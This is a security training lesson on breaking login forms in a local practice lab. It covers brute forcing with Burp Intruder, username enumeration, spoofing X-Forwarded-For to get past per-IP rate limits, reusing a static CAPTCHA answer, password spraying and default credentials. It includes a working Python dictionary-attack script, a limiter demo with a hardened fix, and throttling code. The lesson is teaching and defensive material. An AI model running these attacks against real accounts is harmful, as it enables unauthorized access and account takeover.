Breaking Into Accounts
Authentication is the process of proving who you are. Usually that means a username and password. When authentication is weak, because passwords are guessable, attempts are not throttled, or the credentials have already leaked elsewhere, attackers simply log in.
In this lesson, you'll learn:
- How password attacks work
- Brute forcing with Burp Suite
- Bypassing rate limiting
- Default credentials and credential stuffing
- Multi-factor authentication bypasses
Let's break some logins.
Types of Authentication Attacks
1. Brute Force
Try every possible password combination until one works.
aaa, aab, aac... eventually password123
2. Dictionary Attack
Try passwords from a wordlist of common passwords.
password, 123456, admin, letmein...
3. Credential Stuffing
Use credentials leaked from other breaches.
If someone used john@email.com:password123 on LinkedIn, try it everywhere.
4. Password Spraying
Try a few common passwords against many accounts.
Try Password1 against all users, then Summer2024, etc.
Each account sees only one or two attempts, so per-account lockout thresholds are never reached.
5. Default Credentials
Many systems ship with default passwords that administrators forget to change.
Building the Authentication Lab
Download and run the authentication attack practice lab:
Authentication Attack Lab
Practice brute force, rate limit bypass, and username enumeration attacks
python3 auth_lab.py
The lab includes 5 vulnerable login forms:
- Basic Login - No protection (brute force target)
- Lockout Login - Account locks after 5 attempts
- Rate Limited - IP-based rate limiting (bypassable via X-Forwarded-For)
- CAPTCHA Login - Static CAPTCHA (always "10")
- Username Check - Reveals valid usernames
Test users: admin, john, jane, bob, alice
Attack 1: Brute Force with Burp Intruder
Step 1: Capture the Login Request
- Configure browser to proxy through Burp
- Attempt a login on the basic login form
- Find the request in Proxy → HTTP history
- Right-click → Send to Intruder
Step 2: Configure the Attack
- Go to the Intruder tab
- In Positions, clear all positions (Clear §)
- Select just the password value and click "Add §"
username=admin&password=§test§
Step 3: Add a Password List
- Go to the Payloads tab
- Add common passwords:
password
123456
admin
admin123
password1
qwerty
letmein
welcome
Or load a wordlist file (SecLists has great ones).
Step 4: Start the Attack
- Click "Start attack"
- Watch the results table as it fills
- Sort by the Length or Status column: failed logins all share one value
- The correct password is the response that breaks the pattern (a different length, a redirect, or a Set-Cookie header)
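The same attack as a script, as an added example that is not part of the lesson or the lab's code. It follows Step 4's detection logic: every failed login returns the same (status, length) pair, and the hit is the response that breaks the pattern. The path /login1 for the basic form, the field names username and password, and the credential pair in the simulated login are assumptions; the simulated login exists only so the script runs offline.

```python
"""Dictionary attack against a login form, detecting success by response differences."""
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from typing import Callable, Iterable, List, Optional, Tuple

LOGIN_URL = "http://localhost:8888/login1"  # assumption: path of the lab's "Basic Login" form

# The same short list the lesson suggests typing into Intruder.
COMMON_PASSWORDS = [
    "password", "123456", "admin", "admin123",
    "password1", "qwerty", "letmein", "welcome",
]

Response = Tuple[int, str]                 # (HTTP status, response body)
Sender = Callable[[str, str], Response]    # sends one credential pair


def load_wordlist(path: str) -> List[str]:
    """Read a SecLists-style wordlist, one candidate per line, skipping blanks."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [line.rstrip("\n") for line in fh if line.strip()]


def http_send(username: str, password: str, url: str = LOGIN_URL) -> Response:
    """POST one credential pair to the form and return (status, body).

    4xx/5xx responses are returned rather than raised: a 401 next to a 302
    is exactly the kind of difference the attack is looking for.
    """
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def simulated_basic_login(username: str, password: str) -> Response:
    """Constructed stand-in for the lab's unprotected form so the script runs offline.
    The accepted credential pair is made up for this example."""
    if (username, password) == ("admin", "admin123"):
        return 302, "Redirecting to /dashboard"
    return 200, "Invalid username or password"


def signature(resp: Response) -> Tuple[int, int]:
    """Burp's Status and Length columns: enough to spot the odd one out."""
    status, body = resp
    return status, len(body)


def dictionary_attack(send: Sender, username: str, wordlist: Iterable[str]) -> Optional[str]:
    """Try each password and return the one whose response differs from the crowd.

    Failed logins all produce the same (status, length); the single different
    response is the hit. Returns None when every response looks identical.
    Needs at least three candidates so the failures outnumber the hit.
    """
    results = [(pw, signature(send(username, pw))) for pw in wordlist]
    if not results:
        return None
    counts = Counter(sig for _, sig in results)
    baseline, baseline_count = counts.most_common(1)[0]
    if baseline_count == len(results):
        return None  # nothing stood out: wordlist exhausted, or a better signal is needed
    for pw, sig in results:
        if sig != baseline:
            return pw
    return None


if __name__ == "__main__":
    # Offline run against the constructed form; swap in http_send for the real lab.
    print("simulated lab:", dictionary_attack(simulated_basic_login, "admin", COMMON_PASSWORDS))
```

Against the running lab, pass http_send instead of simulated_basic_login. If every response looks identical, the form is probably returning a generic page and you need a better signal, such as a Set-Cookie header or response time.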
Attack 2: Username Enumeration
The Vulnerability
Many login forms reveal whether a username exists:
- "Invalid password" = user exists
- "User does not exist" = user doesn't exist
Even when the message is identical, a different status code, response length or response time (a server that only hashes a password for users that exist answers faster for unknown ones) can leak the same information.
Exploiting It
- Send the "check username" request to Intruder
- Use a list of common usernames
- Compare responses
- "Username is taken" means valid user
Attack 3: Bypassing Rate Limiting
The lab's third login tracks attempts per IP address. After 5 attempts from the same address, you're blocked.
The Vulnerability
The lab derives the client IP from the X-Forwarded-For header, which the client can set to anything. The lesson shows only the header check; the method name and the fallback to the socket's peer address below are inferred from the lab's description:
def get_client_ip(self):
    # Vulnerable: an attacker-supplied header is trusted over the real address.
    xff = self.headers.get('X-Forwarded-For')
    if xff:
        return xff.split(',')[0].strip()
    # Fallback (inferred): the real peer address, a standard BaseHTTPRequestHandler attribute.
    return self.client_address[0]
The Exploit
Add a spoofed IP header to each request:
POST /login3 HTTP/1.1
Host: localhost:8888
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 10.0.0.1

username=admin&password=test1
Change the IP for each request, so every attempt looks like a new client to the limiter:
X-Forwarded-For: 10.0.0.1
X-Forwarded-For: 10.0.0.2
X-Forwarded-For: 10.0.0.3
In Burp Intruder, use the Pitchfork attack type with one payload position on the password and a second on the X-Forwarded-For value, fed from a list of addresses at least as long as the password list.
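To see why rotating the header works and what the fix looks like, here is an added example (not the lab's code) that models the /login3 limiter in memory with the lesson's threshold of 5. The vulnerable key function mirrors the lab's header handling; the hardened one trusts X-Forwarded-For only when the TCP peer is one of our own reverse proxies, which is the TRUSTED_PROXIES set assumed here, and then reads the last hop, the address that proxy appended.

```python
"""Header-keyed rate limiting: the lab's flaw next to a hardened version."""
from collections import defaultdict
from typing import Callable, Dict, Mapping

MAX_ATTEMPTS = 5                  # the lesson's per-IP threshold
TRUSTED_PROXIES = {"127.0.0.1"}   # assumption: the only reverse proxy allowed to set X-Forwarded-For

KeyFunc = Callable[[str, Mapping[str, str]], str]


def client_ip_vulnerable(peer_ip: str, headers: Mapping[str, str]) -> str:
    """Lab behaviour: an attacker-supplied header overrides the real address."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return xff.split(",")[0].strip()   # first hop is whatever the client typed
    return peer_ip


def client_ip_hardened(peer_ip: str, headers: Mapping[str, str]) -> str:
    """Honour X-Forwarded-For only from a known proxy, and only its last entry."""
    xff = headers.get("X-Forwarded-For")
    if peer_ip in TRUSTED_PROXIES and xff:
        return xff.split(",")[-1].strip()  # last hop is the address our proxy appended
    return peer_ip                         # anything else: the socket does not lie


class IpRateLimiter:
    """Counts requests per derived key and refuses once a key exceeds MAX_ATTEMPTS."""

    def __init__(self, key_func: KeyFunc):
        self.key_func = key_func
        self.counts: Dict[str, int] = defaultdict(int)

    def allow(self, peer_ip: str, headers: Mapping[str, str]) -> bool:
        key = self.key_func(peer_ip, headers)
        self.counts[key] += 1
        return self.counts[key] <= MAX_ATTEMPTS


def brute_force_with_rotating_xff(limiter: IpRateLimiter, attempts: int,
                                  peer_ip: str = "203.0.113.7") -> int:
    """The exploit from the lesson: a fresh X-Forwarded-For on every request,
    all from the same real address. Returns how many attempts got through."""
    allowed = 0
    for i in range(attempts):
        headers = {"X-Forwarded-For": f"10.0.{i // 256}.{i % 256}"}  # never repeats below 65536
        if limiter.allow(peer_ip, headers):
            allowed += 1
    return allowed


if __name__ == "__main__":
    print("vulnerable limiter let through:",
          brute_force_with_rotating_xff(IpRateLimiter(client_ip_vulnerable), 50))
    print("hardened limiter let through:",
          brute_force_with_rotating_xff(IpRateLimiter(client_ip_hardened), 50))
```

The hardened version still needs the proxy to overwrite, not append to, any X-Forwarded-For the client sent, or to be configured so the last entry is always the proxy's own observation; a proxy that blindly appends lets the client poison the earlier hops, which is why the code reads from the right.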
Attack 4: Bypassing Weak CAPTCHA
The lab's fourth login has a CAPTCHA: "What is 7 + 3?"
The Vulnerability
The answer is always the same! It's a static CAPTCHA, so it's just another constant the attacker adds to the request. A CAPTCHA only helps when each challenge is freshly generated, tied to the session and verified server-side.
The Exploit
Just include captcha=10 in every request:
POST /login4 HTTP/1.1
Host: localhost:8888
Content-Type: application/x-www-form-urlencoded

username=admin&password=test&captcha=10
Now brute force normally.
Default Credentials
Many systems ship with default passwords:
| Product | Username | Password |
|---|---|---|
| Tomcat | admin | admin |
| Tomcat | tomcat | tomcat |
| MySQL | root | (empty) |
| PostgreSQL | postgres | postgres |
| Jenkins | admin | admin |
| Router (various) | admin | admin |
| Router (various) | admin | password |
Prevention (For Developers)
Account Lockout
- Lock after 5-10 consecutive failed attempts, and reset the counter after a successful login
- Prefer a temporary lock or escalating delays over a permanent one: a permanent lock lets an attacker who knows a username deny that user access
- Notify the user of the lockout
Rate Limiting
- Limit by username as well as by IP, or password spraying from many addresses slips under a per-IP limit
- Key the IP limit on the TCP peer address; honour X-Forwarded-For only when it comes from your own reverse proxy
- Implement exponential backoff between attempts
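An added example (not from the lesson or the lab) that combines the lockout and rate-limiting advice above: failures are counted per username, so spraying across many IPs still accumulates against the target account; the wait doubles after each failure; a successful login resets the counter; and the account locks after a threshold, recording the event where a real service would send the notification. The thresholds and the injected clock are assumptions made for the example.

```python
"""Per-account throttling with exponential backoff and lockout."""
import time
from dataclasses import dataclass
from typing import Callable, Dict, List

LOCKOUT_THRESHOLD = 10   # assumption: hard lock after this many consecutive failures
BASE_DELAY = 1.0         # assumption: seconds of wait after the first failure
MAX_DELAY = 15 * 60.0    # assumption: cap so the doubling never exceeds 15 minutes


@dataclass
class AccountState:
    failures: int = 0          # consecutive failures since the last success
    next_allowed: float = 0.0  # clock value before which attempts are refused
    locked: bool = False


class LoginThrottle:
    """Wraps a password check with per-username backoff and lockout.

    The clock is injected (default time.monotonic) so the policy can be
    exercised without sleeping.
    """

    def __init__(self, check_password: Callable[[str, str], bool],
                 clock: Callable[[], float] = time.monotonic):
        self.check_password = check_password
        self.clock = clock
        self.state: Dict[str, AccountState] = {}
        self.lockouts: List[str] = []  # stands in for the notification a real service would send

    @staticmethod
    def delay_for(failures: int) -> float:
        """1s, 2s, 4s, 8s ... capped at MAX_DELAY."""
        return min(BASE_DELAY * 2 ** (failures - 1), MAX_DELAY)

    def login(self, username: str, password: str) -> str:
        """Return 'ok', 'invalid', 'throttled' or 'locked'.

        Unknown usernames take the same path as wrong passwords so the
        endpoint does not confirm which accounts exist.
        """
        st = self.state.setdefault(username, AccountState())
        now = self.clock()
        if st.locked:
            return "locked"
        if now < st.next_allowed:
            return "throttled"      # refused before the password is even checked
        if self.check_password(username, password):
            self.state[username] = AccountState()   # success resets the counter
            return "ok"
        st.failures += 1
        if st.failures >= LOCKOUT_THRESHOLD:
            st.locked = True
            self.lockouts.append(username)
            return "locked"
        st.next_allowed = now + self.delay_for(st.failures)
        return "invalid"


if __name__ == "__main__":
    users = {"alice": "correct horse battery staple"}  # constructed demo account
    throttle = LoginThrottle(lambda u, p: users.get(u) == p)
    # The second and third guesses arrive inside the one-second backoff and are refused
    # without the password being checked, even though the third one is correct.
    for guess in ["password", "123456", "correct horse battery staple"]:
        print(guess, "->", throttle.login("alice", guess))
```

Because the check is keyed on the username, the spraying attack from the lab's lockout challenge still hits the threshold; combine this with the per-IP limiter so a single address hammering many accounts is also caught.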
Strong CAPTCHA
- Use Google reCAPTCHA or similar
- Never use static challenges; generate a fresh challenge per session and verify it server-side
- Re-challenge after failures
Multi-Factor Authentication
- Best defense against password attacks: a guessed or leaked password alone is no longer enough
- Use TOTP apps or hardware security keys, not SMS, which can be intercepted through SIM swapping
- Make it mandatory for admin accounts
Lab Challenges
- Brute force admin's password using Burp Intruder
- Enumerate all valid usernames in the system
- Bypass rate limiting using header manipulation
- Attack the lockout-protected login using password spraying
- Bypass the CAPTCHA and brute force passwords
What's Next?
You've broken into accounts. But what happens after login? Sessions.
In Lesson 7: Session Hijacking, we'll learn how to steal active sessions, bypass authentication entirely, and maintain persistent access.